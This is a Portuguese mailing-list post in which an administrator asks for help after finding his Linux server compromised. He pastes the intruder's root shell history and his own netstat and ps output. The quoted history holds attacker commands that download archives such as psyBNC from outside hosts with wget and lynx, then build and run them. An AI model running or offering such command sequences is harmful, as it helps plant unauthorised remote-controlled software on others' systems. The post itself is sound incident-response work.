Ola, Muito obrigado a todos que entenderam o meu desespero. É muito dificil voce convencer os "donos" da rede a liberar um subdominio pra voce! E eles tem razao! As brechas pra invasao sao potencializadas nesses casos! Dado isso, o meu desespero em resolver por aqui: na lista!
Bem, verificando o /var/log, vi que existem ziloes de arquivos la. Presumo que o dito cujo nao deletou nada! Tambem vi que o cara deu os seguintes comandos no .bash_history do root id [uname -a uname -a passwd root uptime /sbin/ifconfig uname -a cd /tmp wget http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar lynx -source http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar > psyBNC2.3.2-4.tar.tar tar -zxvf psyBNC2.3.2-4.tar.tar cd psybnc ls make makefile ./psybnc chmod 777 psybnc cd psybnc[ cd psybnc cd /tmp ls cd psybnc make;pico psybnc.conf;./psybnc ./psybnc ls cd /tmp ls rm -vr psyBNC2.3.2-4.tar.tar rm -vr psybnc ls wget http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz lynx -source http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz > psybnc.tgz tar -zxvf psybnc.tgz cd psybnc ls make pico psybnc.conf vi psybnc.conf ./psybnc /sbin/ifconfig cd /tmp;wget http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz; lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz > psyBNC2.3.2-4.tar.gz ls rm -vr psyBNC2.3.2-4.tar.gz rm -vr psybnc ls rm -vr psybnc.tgz killall -9 psybnc ls ps -aux killall -9 psybnc cd /va/tmp cd /tmp cd /var/tmp lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz > psyBNC2.3.2-4.tar.gz /sbin/ifconfig id cd /tmp lynx -source http://xpl.netmisphere2.com/psybnc.tar.tar > psybnc.tar.tar tar -zxvf psybnc.tar.tar cd ... ./run "dev" ./uptime uname -a /sbin/ifconfig ps -aux killall -9 bindz killall -9 r0nin Alem disso, o comando netstat -pantu mostra Conexões Internet Ativas (servidores e estabelecidas) Proto Recv-Q Send-Q Endereço Local Endereço Remoto Estado PID/Program name tcp 0 0 0.0.0.0:37 0.0.0.0:* OUÇA 355/inetd tcp 0 0 0.0.0.0:9 0.0.0.0:* OUÇA 355/inetd tcp 0 0 127.0.0.1:3306 0.0.0.0:* OUÇA 416/mysqld tcp 0 0 0.0.0.0:13 0.0.0.0:* OUÇA 355/inetd tcp 0 0 0.0.0.0:80 0.0.0.0:* OUÇA 590/apache tcp 0 0 0.0.0.0:22 0.0.0.0:* OUÇA 576/sshd tcp 0 0 0.0.0.0:25 0.0.0.0:* OUÇA 551/master udp 0 0 0.0.0.0:9 0.0.0.0:* 355/inetd Outra coisa seria o comando ps aux que mostra: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.1 1.3 1492 484 ? S 17:43 0:05 init [2] root 2 0.0 0.0 0 0 ? S 17:43 0:00 [keventd] root 3 0.0 0.0 0 0 ? SN 17:43 0:00 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? S 17:43 0:00 [kswapd] root 5 0.0 0.0 0 0 ? S 17:43 0:00 [bdflush] root 6 0.0 0.0 0 0 ? S 17:43 0:00 [kupdated] root 7 0.0 0.0 0 0 ? S 17:43 0:00 [i2oevtd] root 9 0.0 0.0 0 0 ? S 17:43 0:00 [kreiserfsd] root 342 0.0 1.6 1544 588 ? Ss 17:45 0:01 /sbin/syslogd root 345 0.0 1.3 2216 504 ? Ss 17:45 0:01 /sbin/klogd root 355 0.0 1.2 1520 456 ? Ss 17:45 0:00 /usr/sbin/inetd root 370 0.0 2.8 2496 1044 ? S 17:45 0:00 /bin/sh /usr/bin/mysqld_safe root 415 0.0 2.8 2496 1048 ? S 17:45 0:00 /bin/sh /usr/bin/mysqld_safe mysql 416 0.0 15.8 73584 5736 ? S 17:45 0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 417 0.0 1.3 1476 488 ? S 17:45 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld mysql 420 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 421 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 422 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 423 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 424 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 425 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 426 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 427 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock mysql 428 0.0 15.8 73584 5736 ? S 17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock root 551 0.0 3.1 2956 1140 ? Ss 17:45 0:00 /usr/lib/postfix/master postfix 556 0.0 3.0 2964 1096 ? S 17:45 0:00 pickup -l -t fifo -u -c postfix 557 0.0 3.3 2996 1208 ? S 17:45 0:00 qmgr -l -t fifo -u -c root 566 0.0 4.3 6736 1588 ? Ss 17:45 0:00 /usr/sbin/saslauthd -a pam root 567 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam root 568 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam root 569 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam root 570 0.0 4.3 6736 1588 ? S 17:45 0:00 /usr/sbin/saslauthd -a pam root 576 0.0 3.8 3648 1380 ? Ss 17:45 0:00 /usr/sbin/sshd daemon 580 0.0 1.6 1672 616 ? Ss 17:45 0:00 /usr/sbin/atd root 583 0.0 2.2 1756 820 ? Ss 17:45 0:00 /usr/sbin/cron root 590 0.0 13.2 13096 4812 ? S 17:45 0:00 /usr/sbin/apache root 596 0.0 4.7 4112 1708 tty1 Ss 17:45 0:01 -bash root 597 0.0 1.3 1484 476 tty2 Ss+ 17:45 0:00 /sbin/getty 38400 tty2 root 598 0.0 1.3 1484 476 tty3 Ss+ 17:45 0:00 /sbin/getty 38400 tty3 root 599 0.0 1.3 1484 476 tty4 Ss+ 17:45 0:00 /sbin/getty 38400 tty4 root 600 0.0 1.3 1484 476 tty5 Ss+ 17:45 0:00 /sbin/getty 38400 tty5 root 601 0.0 1.3 1484 476 tty6 Ss+ 17:45 0:00 /sbin/getty 38400 tty6 www-data 602 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache www-data 603 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache www-data 604 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache www-data 605 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache www-data 606 0.0 9.3 13096 3380 ? S 17:45 0:00 /usr/sbin/apache root 921 0.0 2.3 2480 864 tty1 R+ 19:03 0:00 ps aux Eu virei o google de cabeca pra baixo e vi que esse y2kupdate e algo do irq! Mas, eu gostaria de saber como descobrir como ele me invadiu? Pois esse psyBNC e algo como um script irq, mas eu nao vi o egg rodando. Alguem que teria vivido ou presenciado algo parecido poderia me dizer o caminho das pedras para limpar o meu sistema, e me precaver, sem uma formatacao do sistema? A principio os logs estao todos la e nao deu um rm em tudo!!!! Obrigado -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
